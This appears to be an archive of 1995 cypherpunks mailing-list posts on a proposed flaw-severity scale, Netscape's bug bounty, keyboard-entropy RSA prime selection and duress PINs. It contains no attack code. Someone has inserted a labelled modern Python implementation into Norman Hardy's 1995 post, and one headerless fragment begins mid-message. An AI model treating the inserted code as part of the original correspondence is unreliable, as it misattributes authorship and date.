From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Oct 95 14:33:53 PDT
To: williams@va.arca.com
Subject: Re: proposal: "security spectrum scale" (SSS)
In-Reply-To: <2648899582.57910054@va.arca.com>
Message-ID: <199510162132.OAA25544@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> it seems to me what is lacking in all this is a *security spectrum*.
>> unfortunately security experts sometimes have a tendency to equate
>> *any* security weakness with a catastrophic one. while this is a good
>> approach in general, i.e. to be as conservative as possible, in 
>> practice there can be no doubt that some security weaknesses are far
>> less severe than others.
>
>Unfortunately, severity is a question of perspective.  In some
>environments, an operating system crash could be considered catastrophic.
>In others, it just means reboot and continue.  I'm not a policy wonk,
>but security is relative to what you care about.

I gave some examples in the initial message. the rating would not
be overly sophisticated, but would cover situations where it is 
pretty obvious which is more insecure than something else. for example
submitting arbitrary code is far worse than merely crashing a server.
or, messing up a client is generally less severe than
crashing a server (which potentially affects a lot more people).
being able to do something *undetected* is
much worse than being detected (during or after the fact). 
viruses are pretty much worse than stuff that can't repropagate
itself, etc.

an example of this is that one article compared netscape
buffer overflows to the Morris internet worm. this was pretty
obviously way out of line IMHO.

>The only way to unify security rankings is to constrain the problem by
>assuming an environment and intended uses for the system.  It sounds
>like you are assuming a low assurance workstation with an internet
>connection which is used for non-critical home or business purposes.

well, this would be a ranking for the general public to help them
understand security problems, so yes, I think it would generally
apply to commercial or internet type environments.

the orange book rating is a reasonable start as you mention. also,
thanks for the paper reference. actually what I am hoping is that
someone from, say, CERT picks up the idea and uses it in their
security bulletins. this would be a good place to bootstrap it
into security consciousness.

>Any flaw rating system needs to consider how it will deal with advancing
>protection technology.  For example, susceptibility to viruses is much less
>critical than it would be if there were no anti-virus software available.

I disagree. this rating would apply to potential problems. a virus is
a very serious matter regardless of anti-virus protection software.
but you raise a good point in that the same bug could have different
seriousness in different environments (say one where the virus checking
is good). that's more complexity than the rating would try to address,
I would imagine.

>Similarly, having a microkernel operating system makes me less susceptible to
>crashes.  Should a flaw rating decrease as technology adapts to deal with it?

my example would be the recent netscape bug. an article might say
the bug was rated G2 on some systems, and say it could be potentially
as bad as A6 on some operating systems. "for comparison, the internet
worm was ranked A2".

>Also, how do you rate situations where flaws are combined to mount an attack?
>For example, I crack a weak password to get a guest account.  Then I snag an
>unprotected password file and crack it to get root.  Then I leave an
>undetected trapdoor to get back in later.

the rating would only apply to flaws. if you have more than one flaw,
a different rating would apply to each flaw. what you are showing is
that again, system configuration could make the same flaw much worse
on one system than another. I don't deny, this is a very tricky
rating scheme. it is only meant to be general however and give the
public an idea of how bad a weakness is. 

the security rating would not be particularly useful to security experts,
other than giving a rough idea of the potential severity of the problem.

again I still believe that
major security categories are being conflated to the point that it
might sound, to Joe Sixpack, that the latest netscape bug could bring
down the entire internet. this gross misperception is easily rectified.

I find this kind of alarmism very counterproductive to improving 
the internet. the internet will not gain widespread acceptance if
there is a *perception* that it is unsafe (regardless of how 
solid it really is). this rating would be an attempt to help the
public understand security issues beyond a very rocky level of
granularity. if something is not done to help convey accurate information,
a void occurs and potentially "urban myths" 
such as "the internet steals your credit cards" would tend to 
arise.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 06:36:16 PDT
To: cypherpunks@toad.com
Subject: OS$ Hackwork
Message-ID: <199510161335.OAA06856@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.oss.net/oss/

[Condensed version of ad in Wash Post 10-16-95]
   
   
Register Now For OSS '95: Fourth International Symposium
  
Global Security & Global Competitiveness: Open Sources
Solutions.  7-9 November 1995 in Washington DC

-----

[Excerpt on workshops]

Hacker Panel (will be repeated 9 Nov 95). Winn Schwartau,
Chris Goggans, Eric Hughes, Emmanuel Goldstein on
specific vulnerabilities of typical national
communications and computing infrastructures, with
specific suggestions for improving both defense and
counter-intelligence against electronic terrorists and
criminals. Invited commentary from DISA, NSA, FBI.

-----

Spies, Scholars, Hackers, Competitive Intelligence
Analysts, Law Enforcement Analysts, Private
Investigators, Journalists, and Information Brokers


Unique conference, acclaimed in the international media
and respected in professional circles. Addresses open
source intelligence (OSINT) strategy, policy, collection,
production, and hands-on specifics. Of vital interest to
all those who consider themselves experts or "knowledge
workers". OSS '95 will feature 25 world-class speakers in 
plenary session, 25 interactive interest and training 
groups, and 75 carefully-screened international exhibits.

Subject Area Themes [with TLA$ galore, gov and ex-s in biz]

7  Nov: Economic Competitiveness & Information Warfare

8  Nov: Military Operations Other Than War

9  Nov: Transnational & Domestic Law Enforcement

This year's conference includes several half-day 
pre-conference workshops on 6 November [including "two
hacker workshops"]:

1) an orientation on open source intelligence for
   first-time attendees,

2) the National Military Intelligence Association will
   conduct a workshop on "Defensive Information War
   Technology", and

3) the Operations Security Professionals Society will
   conduct sessions on open source counterintelligence
   and open source operations security measures.

----------

To register or exhibit:

Voice: (703) 242-1700 / Facsimile: (703) 242-1711
<http://www.oss.net> or <oss@oss.net>

Open Source Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, VA 22124












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sameer Parekh <sameer@palladium.corp.sgi.com>
Date: Mon, 16 Oct 95 16:37:41 PDT
To: cypherpunks@toad.com
Subject: Cardinal Wins Okay for First Online Bank
Message-ID: <3082EA45.41C6@corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.yahoo.com/headlines/current/business/stories/bankonline_289001.html

-- 
Sameer Parekh
sameer@corp.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Oct 95 13:43:06 PDT
To: cypherpunks@toad.com
Subject: Digital Cash The Book
Message-ID: <199510162041.QAA15620@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The eagerly awaited "Digital Cash" (with disk) by Peter Wayner 
is available says the publisher:


APProfessional, 1-800-3131-APP.


$34.95.


Don't know if the author offers the special treatment for this 
that he offers for the excellent "Agents Unleashed."


See his musical homepage at 
<http://access.digex.net/~pcw/pcwpage.html>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:21:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152232.SAA12387@book.hks.net>
Message-ID: <3082EDD2.20C9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


David A Wagner wrote:
> I do think their ``bug bounty'' system is an improvement -- at least
> they're showing some concern for security, and beginning to admit
> that outside review of security-critical code is...well...critical.

  The whole bug bounty thing is an experiment.  We have no idea how
valuable it will be, but we thought it would be worth trying.  As we
gain more experience with it, we will probably evolve it.

> Still, I do agree that they really oughta be employing true experts
> to carefully evaluate their system, if they wanna claim anything about
> its security.

  We are doing that too.  We are paying outside consultants to review
everything related to security.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Mon, 16 Oct 95 10:27:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510161711.AA16223@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain





======
On Sat, 14 Oct 1995, Henry Wertz wrote:

On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offering
> a tee shirt is downright offensive.
>
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
*cut*
     You know, this all seems kind of greedy to me.. It used to be people
would find holes for *fun* and not for profit.  It's still possible to do
that you know 8-).
======

It almost sounds like extortion, doesn't it?

RingZero


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Mon, 16 Oct 95 11:58:16 PDT
To: vznuri@netcom.com
Subject: Re: proposal: "security spectrum scale" (SSS)
Message-ID: <2648899582.57910054@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Vlad Nuri writes:

> it seems to me what is lacking in all this is a *security spectrum*.
> unfortunately security experts sometimes have a tendency to equate
> *any* security weakness with a catastrophic one. while this is a good
> approach in general, i.e. to be as conservative as possible, in 
> practice there can be no doubt that some security weaknesses are far
> less severe than others.

Unfortunately, severity is a question of perspective.  In some
environments, an operating system crash could be considered catastrophic.
In others, it just means reboot and continue.  I'm not a policy wonk,
but security is relative to what you care about.

> to aid this serious problem, I propose the creation of a 
> UNIFIED SECURITY SPECTRUM RANKING.

There already was a USSR, but I think it ultimately failed :-}

For some starters, you should check out:

   A Taxonomy of Computer Program Security Flaws
   Landwehr, C.E., Bull, A.R., McDermott, J.P., and Choi, W.S.
   ACM Computing Surveys, Volume 26 Number 3, September 1994

Which organizes flaws according to how they enter a system, when
during the lifecycle they enter, and where in the system they
manifest themselves.  Some additional papers are available at the
NRL web site.

> this would be a list of all the different types of security weaknesses
> a system can have, and their LEVEL OF SEVERITY. it would attempt to 
> rank every type of security breach possible. then, when a new
> security weakness is discovered, it could be ranked A1 or B5 or C6
> or whatever. this would be a sort of technological "richter scale"
> that would allow the novice to immediately understand that a given
> bug that was recently discovered (say, the recent netscape bugs)
> was, say, not really as potentially severe as the Morris worm.

To whom?

The only way to unify security rankings is to constrain the problem by
assuming an environment and intended uses for the system.  It sounds
like you are assuming a low assurance workstation with an internet
connection which is used for non-critical home or business purposes.

Ironically, the digraphs you propose look sort of like Orange Book
ratings.  Evaluation results, however, tell you something (not everything
by a long shot) about how trustworthy a product is.  Your rating seems
to indicate the exact opposite.  How about a B2 product with a G3 flaw?

I believe that that flaw rating is *exactly* the same problem as product
security rating.  But that's a different discussion.

> however, if we do this, I hope that a good scale that is pretty general
> and doesn't need extensions can be done from the start, before its
> widespread usage, so that later changes do not confuse users. there is already
> confusion in the media about two slightly different richter scales, this
> is a pity.

Any flaw rating system needs to consider how it will deal with advancing
protection technology.  For example, susceptibility to viruses is much less
critical than it would be if there were no anti-virus software available.
Similarly, having a microkernel operating system makes me less susceptible to
crashes.  Should a flaw rating decrease as technology adapts to deal with it?

Also, how do you rate situations where flaws are combined to mount an attack?
For example, I crack a weak password to get a guest account.  Then I snag an
unprotected password file and crack it to get root.  Then I leave an
undetected trapdoor to get back in later.

--Jeff Williams  <mailto:williams@arca.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 17:51:11 PDT
To: cypherpunks@toad.com
Subject: Re: Bug Bounty [noise]
In-Reply-To: <199510160542.WAA09463@desiree.teleport.com>
Message-ID: <3082FD0C.7103@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> Something I noticed about the Netscape Bug Bounty that seems to not have
> been mentioned here...
> 
>         "Linux users need not apply."

  If a linux user finds a security hole that is reproducible in
any supported version then they are still eligible for the prizes.
If a linux user finds a security hole that only applies to linux,
I don't know what the company would do, but I would push for them
being paid as well.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 16 Oct 95 18:03:05 PDT
To: cypherpunks@toad.com
Subject: Using deterministic programs to select private RSA keys.
Message-ID: <aca8b0fa01021004bc41@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Much has been said recently here about how to produce truly random primes.
Suppose you are selecting a secret key to be used by a bank to sign its
documents. Short of examining the code very closely, or writing your own,
you are vulnerable to a program that selects primes from a vastly reduced
set. If this program behavior is known then discovering the secret primes
may be vastly easier. Writing your own code, or examining others' code, is
error-prone and requires trusting someone who knows more math than most
programmers. Here is an alternative that requires only simple high school
math to understand.

I define a simple protocol and commission several independent programmers
to implement it. The protocol is to accept a sequence of key strokes for
printable ASCII characters. Whitespace is ignored except that two
successive newlines terminate the input. MD5 is applied to the input stream
and the result is used to start the search for the prime.

The required entropy must come from the keyboard. Each of these programs
is used with the same input and the yields are compared. It is even better
if the programs are bought on the open market. The more diverse the
interests of the programmers, the less likely there can be an undetected
conspiracy.

The naive objection to this is that the keyboard input will be less than
perfectly random. That is certainly true. The input need not be random--it
is only necessary that there be sufficient entropy. There is a real hazard
that the user does not understand the issues and will merely type in the
first paragraph of the Gettysburg address, having heard that there is about
one bit of entropy per character in the English language.

If several bank officers trust each other but not the other's grasp of
entropy they can each enter text since the accumulated entropy only
increases. (They need not hide the text from each other.)

MD5 only produces 128 bits. It might be wise to require more than 128 bits
of entropy. The scheme as described can only ever produce 2^128 distinct
primes. That is small compared with the number of 1K primes. But having to
test 2^128 primes seems hard enough. Are there other attacks?

You might argue that trusting a program to choose secret keys is no worse
than trusting your operational signing software. True. You can confine that
operational software and compare the yields of programs by different
programmers. (The software of the Space Shuttle uses such redundancy.) The
confinement program must supply any required random salt or padding.
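
Added example (not Norman Hardy's code): one way the protocol in the message above could be implemented in Python, so that independently written programs can be fed the same keystrokes and their yields compared. The message does not say how the MD5 result starts the search, so the stretching step, the upward scan over odd numbers, the fixed Miller-Rabin witnesses, the CRLF handling and the rejection of non-printable input are all assumptions of this example.

```python
import hashlib

# Fixed Miller-Rabin witnesses (assumption): every implementation must test
# candidates the same way, or two honest programs could disagree on the yield.
_WITNESSES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
_WHITESPACE = " \t\n\r\v\f"

# Constructed sample input: two officers type in turn, a blank line ends the input.
SAMPLE_KEYSTROKES = "officer A: 7f!Qz mW29 x;Lr0 pT\nofficer B: u8#Hk 4cVe ]nD1 yS\n\n"


def canonical_input(text):
    """Printable ASCII up to the first pair of successive newlines, whitespace dropped."""
    text = text.replace("\r\n", "\n")        # assumption: CRLF counts as one newline
    end = text.find("\n\n")                  # two successive newlines terminate the input
    if end != -1:
        text = text[:end]
    out = bytearray()
    for ch in text:
        if ch in _WHITESPACE:
            continue
        if not 0x21 <= ord(ch) <= 0x7E:
            # Rejecting instead of skipping keeps implementations from diverging silently.
            raise ValueError("non-printable or non-ASCII input: %r" % ch)
        out.append(ord(ch))
    return bytes(out)


def seed_digest(text):
    """MD5 over the canonical input stream, as the protocol specifies."""
    return hashlib.md5(canonical_input(text)).digest()


def start_point(digest, bits):
    """Stretch the 128-bit digest to an odd number of exactly `bits` bits.
    Stretching adds no entropy: there are still at most 2^128 start points."""
    stream = b""
    counter = 0
    while len(stream) * 8 < bits:
        stream += hashlib.md5(digest + counter.to_bytes(4, "big")).digest()
        counter += 1
    n = int.from_bytes(stream, "big") >> (len(stream) * 8 - bits)
    return n | (1 << (bits - 1)) | 1


def is_probable_prime(n):
    """Miller-Rabin with fixed witnesses, so the result is reproducible."""
    if n < 2:
        return False
    for p in _WITNESSES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in _WITNESSES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def derive_prime(text, bits=512):
    """First probable prime at or above the start point derived from the keystrokes."""
    n = start_point(seed_digest(text), bits)
    while not is_probable_prime(n):
        n += 2
    return n


if __name__ == "__main__":
    print(canonical_input(SAMPLE_KEYSTROKES))
    print(hex(derive_prime(SAMPLE_KEYSTROKES)))
```
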






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 16 Oct 95 16:58:07 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
In-Reply-To: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
Message-ID: <199510162357.RAA28204@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
> 
> Of course, perhaps this encourages someone to steal your card and
> incapacitate you before you can report it. That's why we have
> PINs... so that someone can steal your card, threaten you until you
> reveal your PIN, and then incapacitate you... Hmm...
> 
> Even with a weak PIN system for authentication, you can always provide
> a "duress" PIN, right?


I can think of two purposes for "duress codes":  1.   To yield 
little loot to the thief, thus leaving more of it in your possession
and discouraging theft.  2.  To summon help in the form of physical
force.


The first use is susceptible to the "give me more or I cut off your
little finger" approach.  So we are again faced with the great
importance of a good police force.


Let us not forget about the value of such when constructing our future
visions.


Bryce
signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMILxb/WZSllhfG25AQFiSwP/YgjCyQG/VfMKg8ervnnirEYxaqTdcTXW
AuDmDhVMrtP0J5kr1/7bZVDTY8wNrkptzBM9K8P9TFyhxEZnJZWEfW8PXR2Q28cC
nlUgF5PlWBqlPgnA6mZPbGQD8Fef+en4s1Rh1/9OxTxS3kFy1a3gMdkiR5iSKTVR
S9gGz3HBHNg=
=CmKt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:22:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
Message-ID: <30830332.7BC8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne")
> on Sun, 15 Oct 12:0  AM
> 
> The PR of Bugs Bounty is the aim, as the quick-market-adapter
> Netscape Chair speechified in FR.
> 
> Promoting the notion that hackers are earnestly attacking
> Netscape and reporting its bugs increases its credibility to
> the stock market porkers. Is that not why dear
> all-too-attentive Jeff has been assigned duty on this list,
> feeding peanuts to chimp hackers and champ newshacks?

  I have not been "assigned duty" on this list.  I'm here of my
own free will.  I want to keep up on what's going on in the
cypherpunk world, and sometimes tap the expertise of the list.
I'm not some corporate flack assigned here to "feed the chimps".
My personal feelings definitely lean toward unimpeded strong
crypto, personal privacy, freedom from govt. surveillance, etc.,
and I was interested in this stuff at a personal level before
joining netscape, or working on security stuff.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Mon, 16 Oct 95 15:16:44 PDT
To: cypherpunks@toad.com
Subject: NSA crypto museum article
Message-ID: <199510162216.SAA10517@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



The November 1995 issue of 'Popular Communications' magazine has a nice article
on the NSA Cryptologic Museum.  Included are maps and pictures and stuff.

Don Schimmel wrote the article.

I'm relocating to Herndon at the end of the month so I'll have a chance to
run by there.

Regards,

Mark Hittinger
Internet Manager
WinNET Communications, Inc.
bugs@win.net  bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:21:41 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
Message-ID: <308304EA.28AF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    That's the joy and sorrow of this reading list, the ancient
>    story, talented people working their asses off for sons of
>    bitches who think employees are contemptible, disposable or
>    bribeable for cheap change and backpats -- and easily
>    replaceable on shore or off. Jeff's not alone in this bind.

  I don't share your cynical view of the world.  Having worked for
a year at IBM, I know what that side is like.  I feel pretty strongly
that all employees should have ownership and a vested interest in
the company.  At the last three companies I've worked for, every
employee has had stock options.  I think that companies exist
where management holds the view that you mention, but there are
also companies that value the contributions of their employees.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Mon, 16 Oct 95 15:28:18 PDT
To: perry@alpha.jpunix.com
Subject: Re: Weekly MixMaster list
Message-ID: <9510162227.AA28775@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain



What is the MixMaster list, and what is it for?
Apologies on my newbie status.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________



re reported. You don't need a strong authentication technique
>if a stolen card is easy to cancel.

The card's easy to cancel, but the cash ain't.  Credit cards are
cleared with the issuer.  Digital cash with smart cards acting as
transaction observers don't need this.  The thief need only transfer
the cash from the stolen card to his own, just like he does with
regular cash.

>Even with a weak PIN system for authentication, you can always provide
>a "duress" PIN, right?

Sounds like a better choice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Mon, 16 Oct 95 01:37:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510160837.SAA05368@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Alice de 'nonymous wrote..

>> What would you
>> rather see?  A company makes a beta release for people to attempt to
>> break, fixes the bugs, and then releases a better product?  Or would
>> you rather see a company release a product, tell people it is secure,
>> and then get bitten by numerous holes in it?
>
>Well, I'm not sure that I'd want to make any representations or imply any
>warranties whatsoever. 

Ahhh.... this sort of thinking really lets the user down.

The reason Netscape (et al.) has market capitalisation is because they sell
their product to us, the users. It is a bit of a worry if software authors
can write and then release for sale "buggy" software, and hide safely
behind "I make no warranties etc."

To adopt an analogy... would you be happy to buy a car from Toyota (or
whoever) if they were allowed to hide behind a warranty disclaiming
liability should it break down (or blow up)?

Somewhere along the lines, those who make their money selling software
should have to be responsible for bugs.

Thoughts?

Mark Neely



___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 10:40:35 PDT
To: cypherpunks@toad.com
Subject: [Honk] FR $ec vs US $ec
Message-ID: <199510161740.SAA11885@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Excerpted from: URL: http://www.oss.net/zhi/95-7-oss


                OSS Notices, July, 1995

       France Identifies USA as "Main Adversary"

The following material is so important that we have
chosen to reprint it in its entirety from Intelligence
Newsletter, which we continue to recommend highly.  Call
them at (33 1) 44 88 26 10 for a sample issue or to order
your subscription.

            FRANCE: Ringing the Alarm Bells

"For the first time in France, a boss of the country's
Direction de la Surveillance du Territoire (DST) spoke in
public at a seminar on the theme "Companies and Business
Intelligence" that was laid on by the Institute des
Hautes Etudes de Defense Nationale (IHEDN) at the French
Senate on July 4.  As he himself declared on the
occasion, Philippe Parant agreed to speak out 'despite
the special nature' of his functions in order to alert
French business circles of the dangers of 'economic
warfare'.  To be sure, the main aim of the gathering
which drew a full house was to ring the alarm bell. 
According to Gen. Bernard Norlain, head of IHEDN,
economic warfare now forms part and parcel of 'an overall
approach to defence'.  IHEDN will dispense a course on
business intelligence to 30 high-level trainees in the
fall.

"Most of those who spoke at the seminar identified the
U.S. as both the main adversary in the war and the best
model of how it is fought.  This was especially the case
of Francois David, head of French export credit guarantee
agency COFACE who said the only response to the U.S.
'could be European' in scale.

Elsewhere, Remy Pautrat, deputy head of France's
Secretariat General de la Defense Nationale (SGDN) paid
tribute to the French  president for signing a decree on
April 1 that gave birth to a Comite pour la Competitivite
et la Security Economique under the authority of the
French Prime Minister.  Pautrat said the Committee formed
"the nerve center of a more ambitious system" that was
currently being set up, partly in secret."

             FRANCE-the DST's New Defences

"During the seminar cited above DST chief Philippe Parant
reckoned that economic, scientific, and industrial
espionage had increased considerably over the past few
years.  It now accounted for 60% of cases that come to
the authorities' attention compared to 40% for political,
diplomatic, and military spying. Methods had also changed
because state-sponsored espionage had increasingly taken
a back seat to a type practiced by private intelligence
companies, international audit firms, head-hunter
concerns, as well as insurance and reinsurance companies. 
Parant said that effective defence against the onslaught
could not come from government services alone.  "If that
were the case the game would be lost in advance," he 
declared.  He suggested that as many staff as possible in
big companies be made aware of business intelligence
concerns.  In addition he called for "genuine
information-management training in engineering
universities."  For maximum impact, he said, such
training should not be dispensed by security services but 
rather by specialists in each specific discipline."

                L'Expansion Cover Story

With the above background in mind, we can now better
understand the cover story in L'Expansion of 10-18 July
1995.  This prestigious journal, widely regarded as the
French equivalent of Forbes, Fortune, and Business Week,
appears to have been manipulated by French civilian
intelligence and self-promoting private sector business
intelligence activities.

The cover story of L'Expansion is nothing less than a
call to arms for the French business community, and the
opening declaration of war on the United States of
America.  Unfortunately, this article was very likely
drafted in active cooperation with French civilian
intelligence experts, and should be considered a "covert
media placement".

I have taken a personal interest in the article because
it links me with President William Clinton, Director of
Central Intelligence John Deutch, and the founder of
Kroll Associates, Jules Kroll.  I am honored.  Sadly, the
article, while identifying me as the apostle of open
source intelligence, is gravely in error when it
identifies me as the linch-pin for a new covert strategy
to undermine the French economy, and also alleges that 
I have been actively discouraged from implanting myself
in France by the French authorities.

There are three "realities" that need to be explored
here.  First, there is a budget battle going on in
France, and the French civilian intelligence services are
doing everything they can to "hype" the threat and obtain
increased manning and funding.  This should not surprise
us, but the apparent subversion of the previously
prestigious journal L'Expansion to the desires of French
civilian intelligence, is cause for concern.

Second, my sources in France tell me that the larger
French companies, especially those in the defense sector,
do not take this threat seriously because they are much
superior to U.S. companies at the business of industrial
espionage.  A very well-informed source has suggested to
me that this cover story is the result of an alliance
between French civilian intelligence (attempting to
increase its budget) and General Pichot-Duclos of
INTELCO, who is attempting to increase his business
practice among the small businesses in France foolish
enough to believe in this exaggerated threat.

Finally, for the record, I wish to note that I was
invited to France by Mr. Francois Leotard, the Minister
of Defense, with the explicit approval of Prime Minister
Balladur, in order to join Admiral Pierre Lacoste,
General Jean Heinrich, and General Jeannou Lacaze in
speaking to a very select group of 300 French leaders
from government, industry, and the  academy on 23 October
1993.  We spoke about the need to reinvent intelligence
and significantly increase reliance on open sources.  The
presentations that these distinguished flag officers and
I made have been published in a book  called Defence and
Intelligence, available (in French) from Editions
L'Harmattan, 5-7, rue de l'Ecole-Polytechnique, 75005
Paris.


Robert D. Steele, Publisher

Open sources Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, Virginia 22124-1807












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:22:47 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <199510151421.HAA08833@jobe.shell.portal.com>
Message-ID: <30830CB4.7C6F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> After emailing the company more than two days ago, I would hope that a
> communications channel would have been opened, or alternatively I would
> have held out a hope that someone from Sun or Netscape might have made an
> official comment here or publicly.  I would have expected something
> other than a stone-walling silence.
> 
> My Friday the Thirteenth post obviously has people shaken. Clearly, Friday
> was not the day to comment about this serious problem.  There was no
> utility in causing panic and disrupting trading in Netscape stock,
> especially in a market that can only be characterized as frothy.  But now
> here we stand, many hours and days later, with the questions raised
> remaining unaddressed, and with my copyright restriction on my Friday
> post hereby, and herein explicitly waived.

  I'm not really sure what you are talking about.  Are you referring
to the bugs that were reported here, and have since been fixed, or
are you talking about something new?

  Who at netscape did you e-mail?

  What Friday the Thirteenth post are you referring to?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 16 Oct 95 19:04:20 PDT
To: cypherpunks@toad.com
Subject: Re: Bug Bounty [noise]
Message-ID: <199510170204.TAA12213@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 10/16/95 -0700, you wrote:
>Alan Olsen wrote:
>> 
>> Something I noticed about the Netscape Bug Bounty that seems to not have
>> been mentioned here...
>> 
>>         "Linux users need not apply."
>
>  If a linux user finds a security hole that is reproducible in
>any supported version then they are still eligible for the prizes.
